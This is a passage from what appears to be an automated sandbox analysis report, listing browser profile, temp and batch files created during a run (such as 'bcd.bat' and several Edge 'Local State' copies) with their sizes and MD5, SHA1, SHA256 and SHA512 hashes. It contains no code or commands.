                                                                                                                                                                                                                                                                        d7bacdceda04851185d18c65f5457f35555ccb0e2c9d7a1600bf1742270af778

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        0316164b88387aa442977158d8a86472f0ba26949437113d506709a58239e1f6f3b1e11c4473b874768b649a09de55de52782581d18a69e1050753b083138fdc

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        4b0a7d485c48eeef6777b991fbceb3e3

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        f96c6ed9127a1d42add6657349c7a71051526ccc

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        4394e7016fcede92e480a0c3767dd6de9beda87dac3afc28aa24c0b894fb9a4a

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        8a8a1391151a4d924d16aa72ebd85c06ee82c3eaaddd5655edddfdeedab6da12ecd3cca06aa20fdac7aff2fd1639bc9095c5c332c06adf3733f53d425931491d

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        c734b2f80526c85b4a08b3d68ffdb86b

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        2fcdeb23bae0cd81e91a40e84674ab1221ef7fec

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        c2577c903452df914078d0d6c48b97aaf4aea7a7958369440f88c163a758e848

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        d96c8161a60f98e920294e29d7482067ba255213e7461613f1980a27feffcb8bff0d83bf03f4bb8c8f6c0dbe91325623dfeb2fffa33aa5babdd809830b9fd0ff

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        8a66f4c1e7d581575bc87d10a7df4984

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        88506202d0e8c8ad7462eeeb239a761dccc32e02

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        9a745c74dccd689ba4220ee1e3e71c907b3191d5fa9b1ded245844b71ffbfafa

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        a387c8b790c1c7eb8507650c2ef031bf5e7b97972639dea9da852af493623d85e069a867811efede6a3b2278eb0635814b2e793a6a2e2ad3b20e7437b928f84a

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57d021.TMP

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        707B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        ee0c0390d870f922c55617a6176b4a0b

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        93279dd70f26c4b948fd4f862f9547d89a4d9cc5

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        81c1cd8702e5af24b3db3f11a644c87d61db4036f3574e6c568c4fe7da83270e

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        e758d710a76137419ff8296dff77ff701af5a61372503ed8653ba383b9e72aa0fc43b637a3f789a93777dc55fd2e7918e646e4b6d3989b93a553dbc93713bf4d

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        16B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        10KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        c55d62e93f776e46fa7558d70915d6a4

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        2061446d54b20c038fc82a4b44622c7236166688

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        969f4e04065645aef0756b50194f092f76bf2b09082d1bdd1e2b97a446edd0ff

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        b018336267514328ea5039286b6546cc459834bc817bbe3845116f1dac4c5539df8b3e854d8cc76e54e92024866d3abf65d422a162bb63b27dba40abaac2a2ed

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        10KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        8fbe9215b67fe0a64880a42e47369770

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        1eab2562e32384ac524c604f47cef8283273fa0f

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        23c70e5a5c1f6e3bd65c67a144d43263b1e91ed454ae5c30c2ae85480169377b

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        961d6f95206a36fa4eff4844ea308ec8294276393d0b2fae769af1ff86f726dff1fe69e261cb46dcbd1eb4a7d4be25d543ef290905029c84b66b4de6f8ef2a9a

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        11KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        078a4bd8971e2fee21984a3f797dd9b5

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        6f8b5893e61285d48b8e224338c3fe8f5bb9acb2

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        30692830001db9d5c2fa4531a52341fc02bf6ebfb4a4dc28d56b17384adbeb43

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        49790d9aa1180dade68a4dc36ce6c1555480d34fc0a3c88d594de5177a3d56bcc2976ca8af0a8be60227ebe210b72c07addeafc2b499fc149ecebfcb692f4de3

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        11KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        7937b13990bd1942692441fb8a247bc9

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        af19410ba27ababe5da43624777231db816a3074

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        fdec4b4d1516218808996b8b44d0ce35a43f92c581d210f0cf5829192ad0c282

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        9804c35a8533b489b5287aee1aa56bd091a0c2b357549d8c36c53fadfba6e480fba0ae6dd94a2dca4cb6d0de7041a764c5b5054322bdf478d2bccf7a0499f7c5

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        11KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        b127dfa4f829065dcb14c219186c9bf5

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        45a3aef40b1a767b70d895a28b2aa539a528a82b

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        72223810a91ad3edb95a50cc13e1f38fe4e042ffe98daf253958554aad02501e

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        eefb0b356a31a75b354882673af4e9ed32f11f93d170a512548d0de4178a409963c29a1e675928cd381cdcaf829688e3b2f90ee8d8e8825a52963f7606cd1ae1

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        11KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        908bb0f1c3dccdceb1dc2a2891684968

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        01be0ed79130e2c04a511aa61d8c9e17d4037f51

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        7f18fc4a556beb8a13473ad87f0079f878d614bd479e2c31d840578f4f24a809

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        9b0fedb929301e1b89ae99fbf4ac9ca08d4038442932581d27bd1aff0afbe676ab5173a98a90760b7f1f7f16b63c286d6c72a478dc01d2f817ca3f95861ae637

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        11KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        a28bf44ed67c3988ce095f6e22b068ce

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        714fe057b41840926392da8d16fd16a6013380f6

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        e51b7be272f4fee8d53bdf7795b76157256cc8ce7122b6452f84737780c5155c

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        a7dbc0a76108541899d201fde11a29cd74af8bf1e9745a4b0c3528126e9480227bac231da637e03cb3be8ecf7db1a91bf5946d36fe360eefbe6c4c3a571305f8

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        11KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        a534dd7b765f9c1e442847ee89828580

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        f7d9a3384baec9f1373993964498f99c244c8a44

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        d9a002c83db8b8417b5265d0758a8b28e1435a05c7655692ebb768a8d0856999

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        4c8bbaae4f758c4a1c65b8b66d2138acf615ce4b997f7d1cb3f98b80cb91ef214396310edd03049efc2872fbd57eff82366ef4a21c5f7354b43acad1f149ae9b

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        11KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        93006b9ccc97681d35d1f9534c5ea403

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        2f918a748cd27cf65a176137f79addd15b480c14

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        74c86b05ca8b0f52d386a98b3b29f99096b5ad56e92ed5bd6087a257459a8064

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        17ee24cc62fd52c8550b88ab9b8d19599c0411947bd2ebd1a92cca6983049f046479072bb93284d42c1a5b6948ea5e1d15a5f09ea0504915f89f7e7b8dcf0d46

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lhmx4teg.default-release\activity-stream.discovery_stream.json.tmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        18KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        f80dbb701bd70dfda0674bde58cd9254

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        38f581c49610077d133b405ccc25e9827896a203

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        b8b66053c6096eb0de16a3dcda7ffda6f241137e944d668a52e5628482f07d2f

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        4f4d2e275abfa662071978e38b4cadbdb0c00766154e9aa1e18c63cadebcdbab4947f0dc94440b26fc9060b43fa7e42f6a6375aad5363bf5b48af6d400161b76

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lhmx4teg.default-release\cache2\entries\6D89348819C8881868053197CA0754F36784BF5F

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        15KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        7f01c4887b1301032bb687320731cc63

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        6d15e6080513ffc02c51b5252f8b6a09bc3683bb

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        6cbf72cd1f8fb1b702a699357735dc331e200d4b4be5901b12d6f707b3473c19

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        05644bccf903f816bb1e8de8bdf1dc25eba5ec674c4eeb5b4f58b0eb430c0cf367a72165047986167caf144d4a14a5e08bfb801f841678b832438573fbc80dc0

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        479KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        09372174e83dbbf696ee732fd2e875bb

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        ba360186ba650a769f9303f48b7200fb5eaccee1

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        13.8MB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        0a8747a2ac9ac08ae9508f36c6d75692

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        b287a96fd6cc12433adb42193dfe06111c38eaf0

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\~DF045A24FD2514D58D.TMP

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        16KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        5631965bbe5fe49c46e587fb235b8328

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        da1f258d2cd4ddb85c00da5ebcbf13913c9bdaa4

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        2af6bf96b477a763a76421fb9e763166dd803026c803d2986508a3eb58da1230

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        56e766372835a2b211e1f643343e478cfa1dc2cab319b41af5ac78943c6cae6b6a1881e017cbc049e8ebeca5c5eb3ade7edb020c4cc3bba9317782452a7c51de

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\bcd.bat

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        236B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        d20a8a43094ea0dbd522bbcd49532502

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        a14fda6177bb86e7623e5c42d9c50473edcc8bd2

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        1acd8fa1bb77825270abb801b6fef7cfb02598e4eb77911722cc1d389b4cf318

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        84a1a5c21a69e6d090cc0cdf4731fd4bed52781a8ec17322f35ef085bbd38a516c1d9c0cef81b6ad154efb396e8d3f4700e496e1e2b24b238dac397c0b72b662

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        3KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        8b797c7e9128416803dc6362e77ec87b

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        2fde1bc736850fe47fd0f4689551318e27e5f4fb

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        76f870f6460879c0265c15fae6b8655dae043726a8f59fcc6540474c40460005

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        0a1d6ec93a2bad1e2925920112ef4d8d9d08708234ed49088e5312c0c0f1f59d3ae195fcd8822ffb13a34501a65a32a3cd13c981bde3ecf59786ff9fb2316b3e

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3PMMVU6IGALDDTVKJ2AO.temp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        9KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        48a5f425bb81c73142ec479609b73cc5

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        449ee0a9456291e672cbf25816f495268dc4bcd2

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        859784a22bd28c3336c0742bf1aedec18b86cb24d2bea859b2fd1f5e12810dd7

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        c733fbac4a538b17820992c7a56d2209d4db213f8081e32e83041375a6bb60549bb0b60901355ba5c00afe30f980a2097b65a413158e1c0e65883c8bfc679ecc

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\AlternateServices.bin

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        ebd56089c77f5134eba4a2cbf1859f45

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        2ae6241a27b9eaa1339e98ad75f9337e93aeeee9

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        108f34e1dfc29f424c4cc30a0a2ab67a2cd1a9f48aff93acf71a7b0d9212bf60

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        90e30ee9bedd8b67f1b81a69062158bccc7ee0f0adff5348887a633e48600433cfcc40296bbbab0491bf1baec4d711933c5a1c5501186763c6f983c815ca71f5

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        22KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        28ffd0564048c4b5bb7e8070ac9e2723

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        654d8d78451352cc34dc4c08194820bc5118f28f

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        d04da583fed4181872c4113a55043f2283adc10139ea5132e9d0b581107227f7

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        a8cce187c66b1bbd0e023f84adf694bc47b492d37c2b3aa01ca783d9d936941db3f2a176d195ee18fe52db24a9ede82c70b6f0d9dff45a3c6d3f6618ff43efa8

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        21KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        289cbe2ad4ea7735e3ba3a343e34ec2a

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        17a5728207a49d264e9f6f5c59dafcf94c1f82ec

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        161033fae1da4b87be9d4a70106ac25beb9cb27d3a38d26264d893d9a6aab743

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        1f784c5c0561937fb24a90fb524a52c59fe6a352c2a270363443c4ed916f2a28e8383862056880e66bd115e6a8d510d441c94aec4db3d4c7d69bcc5f07cce12f

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        22KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        f795332a34751849e627409feca14acb

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        d96d958ff655b469333921e7f4776f622fe12b11

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        3e4b547616feabd60f8724f9f9beaf2f1d2e6fb73db5050c178aa352a9def2b1

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        755c3648ef85a08bbf7792de8eeff34766f7ab36aff127a4991c1c2480f00a88649ead3d685f95c72f0155b34f9418796ee2adf89a9e1a32333ff96788fb4281

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        22KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        2c6dfffa4aa01bf544d8d849b84929ce

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        de47f481f2ad1682b53a2eb37616e7502f687eab

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        bf8277dcedafda68fec70f247b876231e68b2173b48cf06d2c60f05c949d65da

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        efa13c9bac76d4ab7756214b83f4393809a969d80092cff7f189dd09640c6d3b46403b6c3129ec9d44d73d63de2892032532956b13b0f399c635707608c2d206

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\pending_pings\584da799-61cc-4ce6-8266-0fee402c2050

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        982B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        fbce43ff4e6e1af48ec5975f40528c2a

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        19acb55511963c0e33774fd1ea040f167011f0d6

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        fdb91fbb407921df6bb48a6c27e7bd5860e783c4074837bcf39a9c8451863f85

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        ca5e75f3ea8058cc37d2d988050416308a4a99488fa35876b12434c1084ca9aafd743cff85b315234f5b6a2c336c977d226719a1b77c7b8e99588f6e1f67e5c4

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\pending_pings\cbdaaa22-aa35-413d-a3ca-ce71f8828375

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        659B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        e0eb06c04e689abe1a961a8a4a2e893a

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        ebffa42656507a0a74ec99355c4d708366ec334a

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        8a3e8512a13b6bae45c1376c57828e9ffcbbfed855faf6f952aa3ba8e6530c00

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        b227ce357a7bb0eda496d501fd186b46df0c8e4194891a27654c33cbde3f00d2f78f137929969e1ec42a9bcee4cf0aeee0a7b9c846cc0b0338fd7cbc2e32e572

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1.1MB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        842039753bf41fa5e11b3a1383061a87

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        116B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        2a461e9eb87fd1955cea740a3444ee7a

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        b10755914c713f5a4677494dbe8a686ed458c3c5

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        372B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        bf957ad58b55f64219ab3f793e374316

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        17.8MB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        daf7ef3acccab478aaa7d6dc1c60f865

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        f8246162b97ce4a945feced27b6ea114366ff2ad

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\prefs-1.js

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        11KB

                                                                                                                                                                                                                                                                        MD5

